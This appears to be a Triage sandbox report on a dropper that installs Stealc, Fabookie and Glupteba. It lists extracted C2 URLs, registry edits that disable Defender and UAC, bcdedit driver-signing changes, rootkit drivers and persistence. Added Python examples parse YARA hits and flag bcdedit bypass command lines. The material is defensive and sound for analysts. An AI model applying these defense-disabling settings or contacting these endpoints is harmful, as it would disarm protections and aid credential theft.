Analysis
max time kernel: 147s
max time network: 144s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 26/01/2024, 19:05
Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20231215-en
General
Target: file.exe
Size: 23KB
MD5: 13e50553cf74404e0667de093b05d4bb
SHA1: d2b4e780b13305b25cba7cd3b2259d94d84120a8
SHA256: 8f1db790b8dcd0cfa72966ee8702bfd44c52600a290e40285b21bd6f356c12c5
SHA512: 23f9cbf9e32dbe4f5238e10d9b41d47adb80815122d69c2717e35b1a166c0b45a4767bba52c8c793a2d73f8abe4d9abd0ac57e62b1490d4ef86b3ec639d2a18c
SSDEEP: 384:2uBq0csxekW8SepChIaSpZAuIrl/6Hx4QZb7DFN24uNDZOEv+45GoGCJEF8ZpHbY:cS8oHhxNhuLOyrEFiR1tM
Malware Config

Extracted: stealc
  http://185.172.128.79
  url_path: /3886d2276f6914c4.php

Extracted: fabookie
  http://app.alie3ksgaa.com/check/safe
Signatures

Detect Fabookie payload (2 IoCs)
resource | yara_rule
behavioral1/memory/2512-371-0x00000000031F0000-0x000000000331E000-memory.dmp | family_fabookie
behavioral1/memory/2512-512-0x00000000031F0000-0x000000000331E000-memory.dmp | family_fabookie

Glupteba payload (16 IoCs)
resource | yara_rule
behavioral1/memory/1536-211-0x0000000004C80000-0x000000000556B000-memory.dmp | family_glupteba
behavioral1/memory/1920-222-0x0000000004C40000-0x000000000552B000-memory.dmp | family_glupteba
behavioral1/memory/1536-225-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/1920-226-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/1536-258-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/1536-271-0x0000000004C80000-0x000000000556B000-memory.dmp | family_glupteba
behavioral1/memory/1920-272-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/1156-296-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/2848-298-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/1156-328-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/2848-335-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/2052-358-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/2052-438-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/2052-496-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/2052-558-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
behavioral1/memory/2052-590-0x0000000000400000-0x0000000002EF4000-memory.dmp | family_glupteba
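The memory-dump resource names above encode the PID, a dump sequence number and the virtual address range that the YARA rule matched, and the same region is often dumped several times (2052 appears five times for one region). The parser below is an added example written for this page, not tria.ge code: it turns those names into structured hits, de-duplicates repeated dumps of one region, and separates hits at the usual image base 0x400000 (the unpacked main module) from hits in allocated regions such as 0x4C80000. The sample rows are copied from the tables above; the 0x400000 image-base convention is an assumption stated in the code.

```python
"""Parse Triage memory-dump YARA hits such as
behavioral1/memory/2512-371-0x00000000031F0000-0x000000000331E000-memory.dmp family_fabookie
into (pid, sequence, start, end, size) and group them per rule and per PID."""
import re
from collections import defaultdict

# Sample rows copied from the report's Fabookie/Glupteba tables plus one file hit.
HITS = """
behavioral1/memory/2512-371-0x00000000031F0000-0x000000000331E000-memory.dmp family_fabookie
behavioral1/memory/2512-512-0x00000000031F0000-0x000000000331E000-memory.dmp family_fabookie
behavioral1/memory/1536-211-0x0000000004C80000-0x000000000556B000-memory.dmp family_glupteba
behavioral1/memory/1920-222-0x0000000004C40000-0x000000000552B000-memory.dmp family_glupteba
behavioral1/memory/1536-225-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba
behavioral1/memory/2052-358-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba
behavioral1/files/0x000500000001a09e-423.dat upx
"""

MEM_RE = re.compile(
    r"^(?P<task>\w+)/memory/(?P<pid>\d+)-(?P<seq>\d+)-"
    r"0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp\s+(?P<rule>\S+)$"
)

def parse_hit(line):
    """Return a dict for a memory hit, or None for file hits / blank lines."""
    m = MEM_RE.match(line.strip())
    if not m:
        return None
    start, end = int(m["start"], 16), int(m["end"], 16)
    return {"task": m["task"], "pid": int(m["pid"]), "seq": int(m["seq"]),
            "start": start, "end": end, "size": end - start, "rule": m["rule"]}

def summarize(text):
    """{rule: {pid: [(start, end, size), ...]}} with repeated dumps of one region folded."""
    out = defaultdict(lambda: defaultdict(list))
    for line in text.splitlines():
        hit = parse_hit(line)
        if hit is None:
            continue
        region = (hit["start"], hit["end"], hit["size"])
        if region not in out[hit["rule"]][hit["pid"]]:
            out[hit["rule"]][hit["pid"]].append(region)
    return {rule: dict(pids) for rule, pids in out.items()}

def image_base_hits(summary, base=0x400000):
    """PIDs with a hit starting at the conventional image base (assumption: the
    unpacked main module) rather than in a heap/VirtualAlloc region."""
    return sorted(pid for pids in summary.values()
                  for pid, regions in pids.items()
                  if any(r[0] == base for r in regions))

if __name__ == "__main__":
    for rule, pids in summarize(HITS).items():
        for pid, regions in pids.items():
            for start, end, size in regions:
                print(f"{rule:16} pid={pid:<5} 0x{start:08X}-0x{end:08X} ({size:,} bytes)")
```

Grouping by PID is what makes the table useful: it shows that 1536, 1920, 1156, 2848 and 2052 all carry the same 0x400000-0x2EF4000 Glupteba image, i.e. the same unpacked payload re-launched under several names, while Fabookie lives only in PID 2512.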
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | file.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xO4GOimcBGQkXzhbomVS7wqE.exe = "0" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DufnooWHNFUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WNdNVmbTRKpEC = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\cvDkMpEVJyabfeVB = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WNdNVmbTRKpEC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gNEkwGGiCnIU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\cvDkMpEVJyabfeVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | file.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" | file.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sdTGWCKIydsYsNrSARR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\uxf8mXBfEKTRBQXR1KuWCnLl.exe = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sdTGWCKIydsYsNrSARR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gNEkwGGiCnIU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IAvstfEYU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DufnooWHNFUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IAvstfEYU = "0" | reg.exe
Modifies boot configuration data using bcdedit (14 IoCs)
pid | Process
1236 | bcdedit.exe
1980 | bcdedit.exe
868 | bcdedit.exe
2900 | bcdedit.exe
656 | bcdedit.exe
1916 | bcdedit.exe
2108 | bcdedit.exe
2980 | bcdedit.exe
2072 | bcdedit.exe
1480 | bcdedit.exe
2620 | bcdedit.exe
1952 | bcdedit.exe
1960 | bcdedit.exe
2516 | bcdedit.exe

Downloads MZ/PE file

Drops file in Drivers directory (1 IoC)
description | ioc | Process
File created | C:\Windows\system32\drivers\Winmon.sys | csrss.exe

Modifies Windows Firewall (2 TTPs, 2 IoCs)
pid | Process
2768 | netsh.exe
3024 | netsh.exe

Possible attempt to disable PatchGuard (2 TTPs)
Rootkits can use kernel patching to embed themselves in an operating system.
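The report records fourteen bcdedit.exe runs and a dropped kernel driver (Winmon.sys) but not the bcdedit command lines, so the reader cannot see which boot settings were changed. The classifier below is an added example, not part of the report: it sorts bcdedit command lines into the changes that matter for loading an unsigned driver (test-signing, code-integrity and kernel-debug switches) versus recovery tampering or harmless queries. The command lines in SAMPLE_CMDLINES are constructed for illustration and are not claimed to be what this sample ran; the option names themselves (testsigning, nointegritychecks, loadoptions, /debug, recoveryenabled, bootstatuspolicy) are real bcdedit settings.

```python
"""Classify bcdedit.exe command lines by the boot-configuration change they make.
This report only lists bcdedit PIDs; the lines below are constructed samples."""
import re

SAMPLE_CMDLINES = [  # constructed, not taken from the report
    r'C:\Windows\System32\bcdedit.exe /set {current} testsigning on',
    'bcdedit /set nointegritychecks on',
    'bcdedit.exe /set {default} loadoptions DDISABLE_INTEGRITY_CHECKS',
    'bcdedit /debug on',
    'bcdedit /set {default} recoveryenabled no',
    'bcdedit /set {default} bootstatuspolicy ignoreallfailures',
    'bcdedit /enum',
    'bcdedit /set {current} description "Windows 7"',
]

# (category, what the change does, pattern over the lower-cased command line)
RULES = [
    ("driver_signing", "lets test-signed kernel drivers load",
     r"\btestsigning\s+(on|yes|true|1)\b"),
    ("driver_signing", "turns off code-integrity checks on drivers",
     r"\bnointegritychecks\s+(on|yes|true|1)\b"),
    ("driver_signing", "turns off integrity checks through loadoptions",
     r"\bloadoptions\b.*d?disable_integrity_checks\b"),
    ("kernel_debug", "enables kernel debugging; PatchGuard does not run with a kernel debugger enabled",
     r"(?:^|\s)[/-]debug\s+(on|yes|true|1)\b"),
    ("recovery_tamper", "disables recovery / boot-failure handling",
     r"\brecoveryenabled\s+(no|off|false|0)\b|\bbootstatuspolicy\s+ignoreallfailures\b"),
]
COMPILED = [(cat, desc, re.compile(pat)) for cat, desc, pat in RULES]

def normalise(cmdline):
    """Collapse whitespace and lower-case so the patterns can stay simple."""
    return re.sub(r"\s+", " ", cmdline.strip()).lower()

def classify(cmdline):
    """Return [(category, description)] for every rule a bcdedit command line matches;
    non-bcdedit command lines never match, whatever their arguments."""
    norm = normalise(cmdline)
    if not re.search(r"(?:^|[\\/ ])bcdedit(?:\.exe)?(?:\s|$)", norm):
        return []
    return [(cat, desc) for cat, desc, rx in COMPILED if rx.search(norm)]

def categories(cmdlines):
    return {cat for c in cmdlines for cat, _ in classify(c)}

def patchguard_risk(cmdlines):
    """True when the command set relaxes driver-signing enforcement or enables
    kernel debugging: the boot changes that precede loading an unsigned driver."""
    return bool(categories(cmdlines) & {"driver_signing", "kernel_debug"})

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(f"{c!r:70} -> {classify(c) or 'no finding'}")
    print("patchguard_risk:", patchguard_risk(SAMPLE_CMDLINES))
```

On a real host the command lines come from Sysmon event 1 or 4688 with command-line auditing enabled; fourteen bcdedit runs from a user-dropped binary would be worth a rule on their own, even before the arguments are known. Note also that the dropped-EXE list further down includes dsefix.exe, a name shared with a public Driver Signature Enforcement bypass tool, which fits the same picture.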
Checks BIOS information in registry (2 TTPs, 1 IoC)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe

Drops startup file (8 IoCs)
All eight files were created by AddInProcess32.exe under C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\:
description | ioc | Process
File created | ...\Startup\dqNWS8777gkfYL5K9uS81EQF.bat | AddInProcess32.exe
File created | ...\Startup\jM8pO9IlBuEMnEN0E4grDFiu.bat | AddInProcess32.exe
File created | ...\Startup\uFsNCwiQgGssR2Ms7vRuGSFj.bat | AddInProcess32.exe
File created | ...\Startup\KNRQLCemsacJ5GocEApeDBOE.bat | AddInProcess32.exe
File created | ...\Startup\oGe0JsKsDCqztP7M8hNuWgGo.bat | AddInProcess32.exe
File created | ...\Startup\h6sfur893dbdxSvCsuNRsXai.bat | AddInProcess32.exe
File created | ...\Startup\W5ZhmEfHl4CkzX8RxJw1gaF2.bat | AddInProcess32.exe
File created | ...\Startup\mVM3Fx4BizIGsxw1LUu0FJRO.bat | AddInProcess32.exe

Executes dropped EXE (20 IoCs)
pid | Process
2044 | qf2qmDJ9ve1MH2AQC1wZpqmY.exe
1536 | uxf8mXBfEKTRBQXR1KuWCnLl.exe
1920 | xO4GOimcBGQkXzhbomVS7wqE.exe
2476 | BroomSetup.exe
2512 | uSAXN67jO1NV6A1Dms0TQwUe.exe
2136 | nso8C0C.tmp
2848 | uxf8mXBfEKTRBQXR1KuWCnLl.exe
1156 | xO4GOimcBGQkXzhbomVS7wqE.exe
1752 | 4Obr3e4WwXT6zfKFALzQ6SNr.exe
2052 | csrss.exe
2756 | patch.exe
2944 | injector.exe
2088 | HWoskNzoWXP58nKa90DwL1zh.exe
1876 | zP1vBkts9eMW4Mc2oRVOrTfC.exe
2372 | Install.exe
1884 | Install.exe
2856 | dsefix.exe
2308 | windefender.exe
1820 | windefender.exe
1688 | vPxFIBw.exe

Loads dropped DLL (43 IoCs)
One row per DLL load event, in report order; consecutive identical rows are collapsed with a count.
pid | Process
752 | AddInProcess32.exe (x5)
2044 | qf2qmDJ9ve1MH2AQC1wZpqmY.exe (x2)
752 | AddInProcess32.exe
2044 | qf2qmDJ9ve1MH2AQC1wZpqmY.exe (x3)
752 | AddInProcess32.exe (x2)
2848 | uxf8mXBfEKTRBQXR1KuWCnLl.exe (x2)
832 | Process not Found
2756 | patch.exe (x5)
2052 | csrss.exe
752 | AddInProcess32.exe
2088 | HWoskNzoWXP58nKa90DwL1zh.exe (x2)
752 | AddInProcess32.exe
1876 | zP1vBkts9eMW4Mc2oRVOrTfC.exe
2136 | nso8C0C.tmp
1876 | zP1vBkts9eMW4Mc2oRVOrTfC.exe (x2)
2136 | nso8C0C.tmp
1876 | zP1vBkts9eMW4Mc2oRVOrTfC.exe
2372 | Install.exe (x4)
1884 | Install.exe (x3)
2756 | patch.exe (x3)
2052 | csrss.exe
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

resource | yara_rule
behavioral1/files/0x000500000001a09e-423.dat | upx
behavioral1/files/0x000500000001a09e-426.dat | upx
behavioral1/files/0x000500000001a09e-425.dat | upx
behavioral1/memory/2088-437-0x00000000008E0000-0x0000000000DC8000-memory.dmp | upx
behavioral1/memory/2088-545-0x00000000008E0000-0x0000000000DC8000-memory.dmp | upx
behavioral1/memory/2308-589-0x0000000000400000-0x00000000008DF000-memory.dmp | upx
behavioral1/memory/1820-592-0x0000000000400000-0x00000000008DF000-memory.dmp | upx
behavioral1/memory/2308-591-0x0000000000400000-0x00000000008DF000-memory.dmp | upx

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xO4GOimcBGQkXzhbomVS7wqE.exe = "0" | xO4GOimcBGQkXzhbomVS7wqE.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions | file.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\uxf8mXBfEKTRBQXR1KuWCnLl.exe = "0" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | file.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" | file.exe

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Adds Run key to start application (2 TTPs, 3 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | uxf8mXBfEKTRBQXR1KuWCnLl.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | csrss.exe
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | file.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | file.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow | ioc
11 | pastebin.com
12 | pastebin.com

Manipulates WinMon driver (1 IoC)
Rootkits write to WinMon to hide PIDs from being detected.
description | ioc | Process
File opened for modification | \??\WinMon | csrss.exe

Manipulates WinMonFS driver (1 IoC)
Rootkits write to WinMonFS to hide directories/files from being detected.
description | ioc | Process
File opened for modification | \??\WinMonFS | csrss.exe

Drops file in System32 directory (7 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | vPxFIBw.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | vPxFIBw.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | vPxFIBw.exe

Suspicious use of SetThreadContext (1 IoC)
description | pid | Process | procid_target
PID 2760 set thread context of 752 | 2760 | file.exe | 31
Checks for VirtualBox DLLs, possible anti-VM trick (1 TTPs, 2 IoCs)
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | xO4GOimcBGQkXzhbomVS7wqE.exe
File opened (read-only) | \??\VBoxMiniRdrDN | uxf8mXBfEKTRBQXR1KuWCnLl.exe

Drops file in Windows directory (8 IoCs)
description | ioc | Process
File created | C:\Windows\Logs\CBS\CbsPersist_20240126190528.cab | schtasks.exe
File opened for modification | C:\Windows\rss | uxf8mXBfEKTRBQXR1KuWCnLl.exe
File created | C:\Windows\rss\csrss.exe | uxf8mXBfEKTRBQXR1KuWCnLl.exe
File opened for modification | C:\Windows\rss | xO4GOimcBGQkXzhbomVS7wqE.exe
File opened for modification | C:\Windows\rss\csrss.exe | xO4GOimcBGQkXzhbomVS7wqE.exe
File created | C:\Windows\Tasks\bmfUAJAHieefCXsdaD.job | schtasks.exe
File created | C:\Windows\windefender.exe | csrss.exe
File opened for modification | C:\Windows\windefender.exe | csrss.exe

Launches sc.exe (1 IoC)
sc.exe is a Windows utility to control services on the system.
pid | Process
1556 | sc.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | nso8C0C.tmp
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | nso8C0C.tmp

Creates scheduled task(s) (1 TTPs, 8 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2104 | schtasks.exe
3020 | schtasks.exe
2332 | schtasks.exe
2620 | schtasks.exe
320 | schtasks.exe
1192 | schtasks.exe
1368 | schtasks.exe
1748 | schtasks.exe

Delays execution with timeout.exe (1 IoC)
pid | Process
2024 | timeout.exe

Enumerates system info in registry (2 TTPs, 2 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Modifies data under HKEY_USERS (64 IoCs)
In the rows below, <MuiCache> stands for the shared key prefix \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E; the remaining rows give their full path.
description | ioc | Process
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
Set value (str) | <MuiCache>\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | xO4GOimcBGQkXzhbomVS7wqE.exe
